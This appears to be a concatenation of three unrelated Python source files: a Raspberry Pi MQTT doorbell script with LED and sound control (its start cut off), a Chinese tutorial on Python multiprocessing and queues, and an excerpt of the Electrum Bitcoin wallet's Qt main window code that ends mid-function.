#SETTING_FILE = os.path.dirname(__file__) + "/setting.json"
# 設定ファイル読み込み
with open(SETTING_FILE) as f:
data = json.load(f)
# print data["device_id"]
myName = data["device_id"]
HOST_NAME = data["mqttc_host"] # Mosquitto host
PIN_LED = 11
PIN_BUTTON = 15
led_flag = False
# 音関係
SOUND_FILE = '/home/pi/project1/sounds/knock.wav' #音ファイル
SOUND_FILE_START = '/home/pi/project1/sounds/start.wav' #起動音
SOUND_FILE_SEND = '/home/pi/project1/sounds/chime.mp3' #呼び出し音
SOUND_LOOP = 3 #loop count
SOUND_SLEEP = 5 # 10秒再生
STATUS_PUB = 0
STATUS_SUB = 0
"""
knock再生
"""
# 音再生スレッドの開始 Sound({ループ回数},{再生秒数},{音声ファイル})
class Sound():
def __init__(self, loop = SOUND_LOOP, sleep = SOUND_SLEEP, file = SOUND_FILE):
self.loop = loop
self.sleep = sleep
self.file = file
self.play_event = threading.Event() #再生させるかのフラグ
self.stop_event = threading.Event() #停止させるかのフラグ
self._started = threading.Event()
self._running = threading.Event()
self._resume = threading.Event()
#スレッドの作成と開始
self._thread = threading.Thread(target = self.target)
self._thread.start()
def target(self):
print("音再生スレッド開始 =================")
if self.running:
self.stop()
self.play()
def play(self):
# """音声を再生させる"""
self.play_event.set()
print("音再生中 =================")
pygame.mixer.init()
pygame.mixer.music.load(self.file)
pygame.mixer.music.play(self.loop) #loop count
time.sleep(self.sleep) #指定秒数秒再生
pygame.mixer.music.stop() #停止
pygame.mixer.quit() #音源への電源停止:サーってノイズを消す
print("音再生完了 =================")
self.stop()
print("音再生スレッド完了 =================")
def stop(self, wait=True):
"""スレッドを停止させる"""
if self.started:
self._running.clear()
# We cannot wait for ourself
if wait and (threading.current_thread() != self._thread):
self._thread.join()
self._started.clear()
self._resume.clear()
@property
def running(self):
""" Whether the thread is running. """
return self._running.is_set()
@property
def started(self):
""" Whether the thread has been started. """
return self._started.is_set()
"""
LED点灯(はやい)応答受付中
"""
def led_on_fast():
global PIN_LED, led_flag
print "--LED ON(はやい)" + str(led_flag)
i = 0
n = 5
if led_flag:
while True:
i = i + 1
if led_flag:
GPIO.output(PIN_LED, True)
time.sleep(0.2)
GPIO.output(PIN_LED, False)
time.sleep(0.2)
GPIO.output(PIN_LED, True)
time.sleep(0.2)
GPIO.output(PIN_LED, False)
time.sleep(0.6)
else:
break
if i >= n:
break
else:
GPIO.output(PIN_LED, False)
print "--LED ON(はやい) 終了"
"""
LED点灯(ゆっくり) 呼び出し中
"""
def led_on_slow():
global PIN_LED
print "--LED ON(ゆっくり)"
i = 0
n = 2
if led_flag:
while True:
i = i + 1
if led_flag:
GPIO.output(PIN_LED, True)
time.sleep(0.8)
GPIO.output(PIN_LED, False)
time.sleep(0.4)
else:
break
if i >= n:
break
else:
GPIO.output(PIN_LED, False)
"""
LEDをOFF
"""
def led_off():
global PIN_LED
print "--LED OFF"
GPIO.output(PIN_LED, False)
"""
メッセージをサーバーに送信する
"""
def publish_mqtt(msg):
global led_flag
try:
print "try publish_mqtt=" + msg
publish.single(
"messageID",
client_id="1",
# clean_session=True,
payload=msg,
hostname=HOST_NAME)
print "publish mqtt time %f"
print "payload=" + msg
except IOError:
print "publish error."
"""
接続完了
"""
def on_connect(mqttc, obj, rc):
mqttc.subscribe("$SYS/#", 0)
print("rc: " + str(rc))
"""
受信したメッセージ
"""
def on_message(mqttc, obj, msg):
global myName, STATUS_PUB, STATUS_SUB, led_flag, sound_th
# print("msg:"+msg.topic+" "+str(msg.qos)+" "+str(msg.payload))":
if msg.topic == "messageID":
print("knock受付 =================")
yourName = str(msg.payload).split("::")
print("msg.payload = "+ msg.payload )
print("len(yourName) :"+ str(len(yourName)) )
if len(yourName) >= 2 :
print("yourName:"+yourName[1])
if myName != yourName[1]:
print("publish %s" % msg)
sound = Sound() #音再生スレッドの開始
led_flag = True
led_on_fast()
"""
publishした情報
"""
def on_publish(mqttc, obj, mid):
print("mid: " + str(mid))
"""
"""
def on_subscribe(mqttc, obj, mid, granted_qos):
print("Subscribed: " + str(mid) + " " + str(granted_qos))
"""
ログ
"""
def on_log(mqttc, obj, level, string):
print("log:" + string)
"""
gpioを監視するスレッド
"""
def gpio_watch():
global PIN_LED, PIN_BUTTON , STATUS_PUB, led_flag , SOUND_FILE_START, SOUND_FILE_SEND
print "起動音 =================="
sound_start = Sound(1,3, SOUND_FILE_START)
time.sleep(0.2)
print "thred start -- gpio_watch =================="
GPIO.setmode(GPIO.BOARD)
GPIO.setup(PIN_LED, GPIO.OUT)
GPIO.setup(PIN_BUTTON, GPIO.IN, pull_up_down=GPIO.PUD_UP)
time.sleep(0.2)
GPIO.output(PIN_LED, 1)
time.sleep(0.5)
GPIO.output(PIN_LED, 0)
time.sleep(0.5)
GPIO.output(PIN_LED, 1)
time.sleep(0.5)
GPIO.output(PIN_LED, 0)
#ボタン待機
try:
while True:
ButtonInput = GPIO.input(PIN_BUTTON)
if ButtonInput != True:
print "button pressed"
#よびかけ送信
publish_mqtt("knock form ::"+ myName)
#音再生スレッドの開始
sound_send = Sound(1,2,SOUND_FILE_SEND)
# LED点灯
led_flag = True
led_on_slow()
else:
# LED OFF
GPIO.output(PIN_LED, 0)
time.sleep(0.11)
time.sleep(0.4)
#program should be finished with "clean" gpio-ports
#when pressing CTRL-c
except KeyboardInterrupt:
print "KeyboardInterrupt Success"
GPIO.cleanup()
except Exception as e:
print e.message
print "Something else"
finally:
print "Finally"
### GPIOのループを別スレッドで行う ###
gpio_th = threading.Thread(target=gpio_watch, name="gpio_th")
time.sleep(0.1)
gpio_th.start()
time.sleep(0.5)
# MQTT待機
mqttc = paho.Client()
mqttc.on_message = on_message
mqttc.on_connect = on_connect
mqttc.on_subscribe = on_subscribe
mqttc.connect(HOST_NAME, 1883, 60)
mqttc.subscribe("messageID", 0)
# MQTT待機開始
try:
mqttc.loop_forever()
#when pressing CTRL-c
except KeyboardInterrupt:
mqttc.loop_stop(force=False) # loopの強制解除
GPIO.cleanup()
print "MQTT - loop - KeyboardInterrupt Success"
except Exception as e:
print "MQTT - loop - e.message : " + e.message
except:
print "MQTT - loop - Something else"
finally:
mqttc.loop_stop(force=False)
GPIO.cleanup()
print "MQTT - loop - Finally"
|
processtest.py
|
#codeing=utf-8
# @Time : 2017-10.06
# @Author : J.sky
# @Mail : bosichong@qq.com
# @Site : www.17python.com
# @Title : Python并发编程(上)进程模块multiprocessing模块和Process类
# @Url : http://www.17python.com/blog/34
# @Details : Python并发编程(上)进程模块multiprocessing模块和Process类
# @Other : OS X 10.11.6
# Python 3.6.1
# VSCode 1.15.1
###################################
# Python并发编程(上)进程模块multiprocessing模块和Process类
###################################
'''
## Python中为什么要用多进程编程?
由于`Python`解释器中使用了内部的GIL全局解释器锁,使得`Python`多线程的并发在任意时刻只允许单个CPU来运行,这样的运行方式会影响程序的并发。
当程序是在I/O密集时,CPU可能会有更多的空闲处理多线程的并发,这种情况下一般是没有问题的。如果是大量计算密集型的应用,如果使用多线程来并发,性能会大大降低,
这个时候,我们就得考虑使用进程`Process`来进行编程及通信了。
## 创建进程Process
'''
###################################
# 第一种方法
###################################
# import time, os
# from multiprocessing import Process
# def clock(x,y):
# for i in range(x):
# print('当前时间=={0}'.format(time.ctime()))
# time.sleep(y)
# if __name__ == '__main__':
# p = Process(target=clock,args=(5,1))
# p.start()
# p.join()
###################################
# 第二种方法
###################################
# import time, os
# from multiprocessing import Process
# class ClockProcess(Process):
# def __init__(self,x,y):
# Process.__init__(self)
# self.x=x
# self.y=y
# def run(self):
# for i in range(self.x):
# print('{0}=={1}'.format(os.getpid(),time.ctime()))
# time.sleep(self.y)
# if __name__ == '__main__':
# p = ClockProcess(5,1)
# p1= ClockProcess(5,1)
# p.start()
# p1.start()
# p.join()
# p1.join()
# 通过`Process`类创建实例,然后传函数创建进程,另一种是继承`Process`类,然后重写`run()`方法创建要执行的任务。
###################################
# 第三种方法 进程池 Pool
###################################
# from multiprocessing import Pool
# import os
# def clock(k):
# for i in range(k):
# print('{0}当前时间=={1}'.format(os.getpid(),time.ctime()))
# time.sleep(k)
# if __name__ == '__main__':
# l = [1 for i in range(20)]# 列表推导出一个列表对象
# with Pool(5) as p:
# p.map(clock,l)
'''
进程池方便创建多进程进行操作,创建使用也是比较简单的,使用时可以根据应用场景对线程的控制要求来选择线程的创建方式。
## 线程间的通信
`Python`为线程提供了`Queue、Pipes`等多种方式来交换数据,我们以`Queue`为例来演示学习一下进程间的通信及协作,稍后我们还要做分布式多进程的演示。
`Queue`进程间通信演示:
'''
###################################
# Queue进程间通信演示
###################################
import multiprocessing as mp
import time, os
from queue import Queue
def prt_q(q):
'''消费者打印数据'''
while True:
v = q.get()
print(v)
time.sleep(0.1)
def wrt_q(q):
'''生产者添加数据'''
for k in ['aa','bb','cc','dd','ee','ff','gg']:
print("{0}已经加入到队列中".format(k))
q.put(k)
time.sleep(0.2)
if __name__ == '__main__':
q = Queue()
wrt_q(q)
p = mp.Process(target=prt_q, args=(q,))
p.start()
p.join()
'''
`Queue`的使用其实就是生产者与消费者的模式,上边的代码运行后会有死锁,请按`ctrl+c`强制停止程序运行。
`Python`的进程有个很强大的地方,就是通过简单的配置就可以进行分布式多进程,这点是很吸引人的,稍后我会有一个篇幅来介绍一下分布式多进程。
'''
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from typing import Optional, TYPE_CHECKING
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor, QFont
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QSpinBox, QMenuBar, QFileDialog, QCheckBox, QLabel,
QVBoxLayout, QGridLayout, QLineEdit, QTreeWidgetItem,
QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
QShortcut, QMainWindow, QCompleter, QInputDialog,
QWidget, QMenu, QSizePolicy, QStatusBar)
import electrum
from electrum import (keystore, simple_config, ecc, constants, util, bitcoin, commands,
coinchooser, paymentrequest)
from electrum.bitcoin import COIN, is_address, TYPE_ADDRESS
from electrum.plugin import run_hook
from electrum.i18n import _
from electrum.util import (format_time, format_satoshis, format_fee_satoshis,
format_satoshis_plain, NotEnoughFunds,
UserCancelled, NoDynamicFeeEstimates, profiler,
export_meta, import_meta, bh2u, bfh, InvalidPassword,
base_units, base_units_list, base_unit_name_to_decimal_point,
decimal_point_to_base_unit_name, quantize_feerate,
UnknownBaseUnit, DECIMAL_POINT_DEFAULT, UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter,
InvalidBitcoinURI, InvoiceError)
from electrum.util import PR_TYPE_ONCHAIN, PR_TYPE_LN
from electrum.lnutil import PaymentFailure, SENT, RECEIVED
from electrum.transaction import Transaction, TxOutput
from electrum.address_synchronizer import AddTransactionException
from electrum.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption)
from electrum.version import ELECTRUM_VERSION
from electrum.network import Network, TxBroadcastError, BestEffortRequestFailed
from electrum.exchange_rate import FxThread
from electrum.simple_config import SimpleConfig
from electrum.logging import Logger
from electrum.util import PR_PAID, PR_UNPAID, PR_INFLIGHT, PR_FAILED
from electrum.util import pr_expiration_values
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, FromList, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton,
ButtonsLineEdit, CopyCloseButton, import_meta_gui, export_meta_gui,
filename_field, address_field, char_width_in_lineedit, webopen,
MONOSPACE_FONT)
from .util import ButtonsTextEdit
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .update_checker import UpdateCheck, UpdateCheckThread
from .channels_list import ChannelsList
if TYPE_CHECKING:
from . import ElectrumGui
LN_NUM_PAYMENT_ATTEMPTS = 10
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
self.setCursor(QCursor(Qt.PointingHandCursor))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
#ln_payment_attempt_signal = pyqtSignal(str)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
def __init__(self, gui_object: 'ElectrumGui', wallet: Abstract_Wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config # type: SimpleConfig
self.gui_thread = gui_object.gui_thread
self.setup_exception_hook()
self.network = gui_object.daemon.network # type: Network
assert wallet, "no wallet"
self.wallet = wallet
self.fx = gui_object.daemon.fx # type: FxThread
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.payment_request = None # type: Optional[paymentrequest.PaymentRequest]
self.payto_URI = None
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.pluginsdialog = None
self.require_fee_update = False
self.tl_windows = []
self.tx_external_keypairs = {}
Logger.__init__(self)
self.tx_notification_queue = queue.Queue()
self.tx_notification_last_time = 0
self.create_status_bar()
self.need_update = threading.Event()
self.decimal_point = config.get('decimal_point', DECIMAL_POINT_DEFAULT)
try:
decimal_point_to_base_unit_name(self.decimal_point)
except UnknownBaseUnit:
self.decimal_point = DECIMAL_POINT_DEFAULT
self.num_zeros = int(config.get('num_zeros', 0))
self.completions = QStringListModel()
self.send_tab_is_onchain = False
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
self.channels_tab = self.create_channels_tab(wallet)
tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
if self.wallet.has_lightning():
add_optional_tab(tabs, self.channels_tab, read_QIcon("lightning.png"), _("Channels"), "channels")
add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(read_QIcon("electrum.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("F5"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'new_transaction', 'status',
'banner', 'verified', 'fee', 'fee_histogram', 'on_quotes',
'on_history', 'channel', 'channels_updated',
'invoice_status', 'request_status']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
# update fee slider in case we missed the callback
self.fee_slider.update()
self.load_wallet(wallet)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
# If the option hasn't been set yet
if config.get('check_updates') is None:
choice = self.question(title="Electrum - " + _("Enable update check"),
msg=_("For security reasons we advise that you always use the latest version of Electrum.") + " " +
_("Would you like to be notified when there is a newer version of Electrum available?"))
config.set_key('check_updates', bool(choice), save=True)
if config.get('check_updates', False):
# The references to both the thread and the window need to be stored somewhere
# to prevent GC from getting in our way.
def on_version_received(v):
if UpdateCheck.is_newer(v):
self.update_check_button.setText(_("Update to Electrum {} is available").format(v))
self.update_check_button.clicked.connect(lambda: self.show_update_check(v))
self.update_check_button.show()
self._update_check_thread = UpdateCheckThread(self)
self._update_check_thread.checked.connect(on_version_received)
self._update_check_thread.start()
def setup_exception_hook(self):
Exception_Hook(self)
def on_fx_history(self):
self.history_model.refresh('fx_history')
self.address_list.update()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_model.refresh('fx_quotes')
self.address_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
#return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name())
return self.wallet.diagnostic_name()
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
e = exc_info[1]
if isinstance(e, UserCancelled):
pass
elif isinstance(e, UserFacingException):
self.show_error(str(e))
else:
try:
self.logger.error("on_error", exc_info=exc_info)
except OSError:
pass # see #4418
self.show_error(repr(e))
def on_network(self, event, *args):
# Handle in GUI thread
self.network_signal.emit(event, args)
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
if event == 'wallet_updated':
wallet = args[0]
if wallet == self.wallet:
self.need_update.set()
elif event == 'network_updated':
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
self.network_signal.emit('status', None)
elif event == 'blockchain_updated':
# to update number of confirmations in history
self.need_update.set()
elif event == 'new_transaction':
wallet, tx = args
if wallet == self.wallet:
self.tx_notification_queue.put(tx)
elif event == 'on_quotes':
self.on_fx_quotes()
elif event == 'on_history':
self.on_fx_history()
elif event == 'channels_updated':
self.channels_list.update_rows.emit(*args)
elif event == 'channel':
self.channels_list.update_single_row.emit(*args)
self.update_status()
elif event == 'request_status':
self.on_request_status(*args)
elif event == 'invoice_status':
self.on_invoice_status(*args)
elif event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
wallet, tx_hash, tx_mined_status = args
if wallet == self.wallet:
self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
elif event == 'fee':
if self.config.is_dynfee():
self.fee_slider.update()
self.require_fee_update = True
elif event == 'fee_histogram':
if self.config.is_dynfee():
self.fee_slider.update()
self.require_fee_update = True
self.history_model.on_fee_histogram()
else:
self.logger.info(f"unexpected network event: {event} {args}")
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.logger.info(f'close_wallet {self.wallet.storage.path}')
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.update_recently_visited(wallet.storage.path)
if wallet.lnworker:
wallet.lnworker.on_channels_updated()
self.need_update.set()
# Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.channels_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.logger.info("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum Testnet" if constants.net.TESTNET else "Electrum"
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Bitcoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Watch-only wallet'))
def warn_if_testnet(self):
if not constants.net.TESTNET:
return
# user might have opted out already
if self.config.get('dont_show_testnet_warning', False):
return
# only show once per process lifecycle
if getattr(self.gui_object, '_warned_testnet', False):
return
self.gui_object._warned_testnet = True
msg = ''.join([
_("You are in testnet mode."), ' ',
_("Testnet coins are worthless."), '\n',
_("Testnet is separate from the main Bitcoin network. It is used for testing.")
])
cb = QCheckBox(_("Don't show this again."))
cb_checked = False
def on_cb(x):
nonlocal cb_checked
cb_checked = x == Qt.Checked
cb.stateChanged.connect(on_cb)
self.show_warning(msg, title=_('Testnet'), checkbox=cb)
if cb_checked:
self.config.set_key('dont_show_testnet_warning', True)
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
shutil.copy2(path, new_path)
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except BaseException as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: self.gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return os.path.dirname(os.path.abspath(self.wallet.storage.path))
def new_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename = get_new_wallet_name(wallet_folder)
full_path = os.path.join(wallet_folder, filename)
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = QMenuBar()
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("&Recently open"))
file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("Delete"), self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_wallet_info)
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("&Private keys"))
self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog)
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey)
self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses)
wallet_menu.addSeparator()
addresses_menu = wallet_menu.addMenu(_("&Addresses"))
addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config))
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import"), self.do_import_labels)
labels_menu.addAction(_("&Export"), self.do_export_labels)
history_menu = wallet_menu.addMenu(_("&History"))
history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config))
history_menu.addAction(_("&Summary"), self.history_list.show_summary)
history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog)
history_menu.addAction(_("&Export"), self.history_list.export_history_dialog)
contacts_menu = wallet_menu.addMenu(_("Contacts"))
contacts_menu.addAction(_("&New"), self.new_contact_dialog)
contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts())
contacts_menu.addAction(_("Export"), lambda: self.contact_list.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices())
invoices_menu.addAction(_("Export"), lambda: self.invoice_list.export_invoices())
wallet_menu.addSeparator()
wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F"))
def add_toggle_action(view_menu, tab):
is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False)
item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
